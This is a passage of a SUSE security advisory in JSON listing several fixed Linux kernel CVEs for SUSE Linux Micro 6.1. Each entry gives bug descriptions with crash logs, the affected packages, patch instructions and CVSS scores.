"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54235"
},
{
"cve": "CVE-2023-54240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54240"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all()\n\nrule_locs is allocated in ethtool_get_rxnfc and the size is determined by\nrule_cnt from user space. So rule_cnt needs to be check before using\nrule_locs to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54240",
"url": "https://www.suse.com/security/cve/CVE-2023-54240"
},
{
"category": "external",
"summary": "SUSE Bug 1255918 for CVE-2023-54240",
"url": "https://bugzilla.suse.com/1255918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54240"
},
{
"cve": "CVE-2023-54241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nMIPS: KVM: Fix NULL pointer dereference\n\nAfter commit 45c7e8af4a5e3f0bea4ac209 (\"MIPS: Remove KVM_TE support\") we\nget a NULL pointer dereference when creating a KVM guest:\n\n[ 146.243409] Starting KVM with MIPS VZ extensions\n[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c\n[ 149.849177] Oops[#1]:\n[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671\n[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020\n[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740\n[ 149.849209] $ 4 : 000000007400cce1 000000007400cce1 0000000000000000 0000000000000000\n[ 149.849221] $ 8 : 000000240058bb36 ffffffff81421ac0 0000000000000000 0000000000400dc0\n[ 149.849233] $12 : 9800000102a07cc8 ffffffff80e40e38 0000000000000001 0000000000400dc0\n[ 149.849245] $16 : 0000000000000000 9800000106cd0000 9800000106cd0000 9800000100cce000\n[ 149.849257] $20 : ffffffffc0632b28 ffffffffc05b31b0 9800000100ccca00 0000000000400000\n[ 149.849269] $24 : 9800000106cd09ce ffffffff802f69d0\n[ 149.849281] $28 : 9800000102a04000 9800000102a07cd0 98000001106a8000 ffffffffc063568c\n[ 149.849293] Hi : 00000335b2111e66\n[ 149.849295] Lo : 6668d90061ae0ae9\n[ 149.849298] epc : ffffffffc06356ec kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849324] ra : ffffffffc063568c kvm_vz_vcpu_setup+0x64/0x328 [kvm]\n[ 149.849336] Status: 7400cce3 KX SX UX KERNEL EXL IE\n[ 149.849351] Cause : 1000000c (ExcCode 03)\n[ 149.849354] BadVA : 0000000000000300\n[ 149.849357] PrId : 0014c004 (ICT Loongson-3)\n[ 149.849360] Modules linked in: kvm nfnetlink_queue nfnetlink_log nfnetlink fuse sha256_generic libsha256 cfg80211 rfkill binfmt_misc vfat fat snd_hda_codec_hdmi input_leds led_class snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_pcm snd_timer snd serio_raw xhci_pci radeon drm_suballoc_helper drm_display_helper xhci_hcd ip_tables x_tables\n[ 149.849432] Process qemu-system-mip (pid: 2265, threadinfo=00000000ae2982d2, task=0000000038e09ad4, tls=000000ffeba16030)\n[ 149.849439] Stack : 9800000000000003 9800000100ccca00 9800000100ccc000 ffffffffc062cef4\n[ 149.849453] 9800000102a07d18 c89b63a7ab338e00 0000000000000000 ffffffff811a0000\n[ 149.849465] 0000000000000000 9800000106cd0000 ffffffff80e59938 98000001106a8920\n[ 149.849476] ffffffff80e57f30 ffffffffc062854c ffffffff811a0000 9800000102bf4240\n[ 149.849488] ffffffffc05b0000 ffffffff80e3a798 000000ff78000000 000000ff78000010\n[ 149.849500] 0000000000000255 98000001021f7de0 98000001023f0078 ffffffff81434000\n[ 149.849511] 0000000000000000 0000000000000000 9800000102ae0000 980000025e92ae28\n[ 149.849523] 0000000000000000 c89b63a7ab338e00 0000000000000001 ffffffff8119dce0\n[ 149.849535] 000000ff78000010 ffffffff804f3d3c 9800000102a07eb0 0000000000000255\n[ 149.849546] 0000000000000000 ffffffff8049460c 000000ff78000010 0000000000000255\n[ 149.849558] ...\n[ 149.849565] Call Trace:\n[ 149.849567] [\u003cffffffffc06356ec\u003e] kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849586] [\u003cffffffffc062cef4\u003e] kvm_arch_vcpu_create+0x184/0x228 [kvm]\n[ 149.849605] [\u003cffffffffc062854c\u003e] kvm_vm_ioctl+0x64c/0xf28 [kvm]\n[ 149.849623] [\u003cffffffff805209c0\u003e] sys_ioctl+0xc8/0x118\n[ 149.849631] [\u003cffffffff80219eb0\u003e] syscall_common+0x34/0x58\n\nThe root cause is the deletion of kvm_mips_commpage_init() leaves vcpu\n-\u003earch.cop0 NULL. So fix it by making cop0 from a pointer to an embedded\nobject.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54241",
"url": "https://www.suse.com/security/cve/CVE-2023-54241"
},
{
"category": "external",
"summary": "SUSE Bug 1255838 for CVE-2023-54241",
"url": "https://bugzilla.suse.com/1255838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54241"
},
{
"cve": "CVE-2023-54246",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54246"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle()\n\nThe rcuscale.holdoff module parameter can be used to delay the start\nof rcu_scale_writer() kthread. However, the hung-task timeout will\ntrigger when the timeout specified by rcuscale.holdoff is greater than\nhung_task_timeout_secs:\n\nrunqemu kvm nographic slirp qemuparams=\"-smp 4 -m 2048M\"\nbootparams=\"rcuscale.shutdown=0 rcuscale.holdoff=300\"\n\n[ 247.071753] INFO: task rcu_scale_write:59 blocked for more than 122 seconds.\n[ 247.072529] Not tainted 6.4.0-rc1-00134-gb9ed6de8d4ff #7\n[ 247.073400] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 247.074331] task:rcu_scale_write state:D stack:30144 pid:59 ppid:2 flags:0x00004000\n[ 247.075346] Call Trace:\n[ 247.075660] \u003cTASK\u003e\n[ 247.075965] __schedule+0x635/0x1280\n[ 247.076448] ? __pfx___schedule+0x10/0x10\n[ 247.076967] ? schedule_timeout+0x2dc/0x4d0\n[ 247.077471] ? __pfx_lock_release+0x10/0x10\n[ 247.078018] ? enqueue_timer+0xe2/0x220\n[ 247.078522] schedule+0x84/0x120\n[ 247.078957] schedule_timeout+0x2e1/0x4d0\n[ 247.079447] ? __pfx_schedule_timeout+0x10/0x10\n[ 247.080032] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.080591] ? __pfx_process_timeout+0x10/0x10\n[ 247.081163] ? __pfx_sched_set_fifo_low+0x10/0x10\n[ 247.081760] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.082287] rcu_scale_writer+0x6b1/0x7f0\n[ 247.082773] ? mark_held_locks+0x29/0xa0\n[ 247.083252] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.083865] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.084412] kthread+0x179/0x1c0\n[ 247.084759] ? __pfx_kthread+0x10/0x10\n[ 247.085098] ret_from_fork+0x2c/0x50\n[ 247.085433] \u003c/TASK\u003e\n\nThis commit therefore replaces schedule_timeout_uninterruptible() with\nschedule_timeout_idle().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54246",
"url": "https://www.suse.com/security/cve/CVE-2023-54246"
},
{
"category": "external",
"summary": "SUSE Bug 1255915 for CVE-2023-54246",
"url": "https://bugzilla.suse.com/1255915"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54246"
},
{
"cve": "CVE-2023-54247",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54247"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Silence a warning in btf_type_id_size()\n\nsyzbot reported a warning in [1] with the following stacktrace:\n WARNING: CPU: 0 PID: 5005 at kernel/bpf/btf.c:1988 btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n RIP: 0010:btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n Call Trace:\n \u003cTASK\u003e\n map_check_btf kernel/bpf/syscall.c:1024 [inline]\n map_create+0x1157/0x1860 kernel/bpf/syscall.c:1198\n __sys_bpf+0x127f/0x5420 kernel/bpf/syscall.c:5040\n __do_sys_bpf kernel/bpf/syscall.c:5162 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5160 [inline]\n __x64_sys_bpf+0x79/0xc0 kernel/bpf/syscall.c:5160\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nWith the following btf\n [1] DECL_TAG \u0027a\u0027 type_id=4 component_idx=-1\n [2] PTR \u0027(anon)\u0027 type_id=0\n [3] TYPE_TAG \u0027a\u0027 type_id=2\n [4] VAR \u0027a\u0027 type_id=3, linkage=static\nand when the bpf_attr.btf_key_type_id = 1 (DECL_TAG),\nthe following WARN_ON_ONCE in btf_type_id_size() is triggered:\n if (WARN_ON_ONCE(!btf_type_is_modifier(size_type) \u0026\u0026\n !btf_type_is_var(size_type)))\n return NULL;\n\nNote that \u0027return NULL\u0027 is the correct behavior as we don\u0027t want\na DECL_TAG type to be used as a btf_{key,value}_type_id even\nfor the case like \u0027DECL_TAG -\u003e STRUCT\u0027. So there\nis no correctness issue here, we just want to silence warning.\n\nTo silence the warning, I added DECL_TAG as one of kinds in\nbtf_type_nosize() which will cause btf_type_id_size() returning\nNULL earlier without the warning.\n\n [1] https://lore.kernel.org/bpf/000000000000e0df8d05fc75ba86@google.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54247",
"url": "https://www.suse.com/security/cve/CVE-2023-54247"
},
{
"category": "external",
"summary": "SUSE Bug 1255892 for CVE-2023-54247",
"url": "https://bugzilla.suse.com/1255892"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54247"
},
{
"cve": "CVE-2023-54251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54251"
}
],
"notes": [
{
"category": "general",
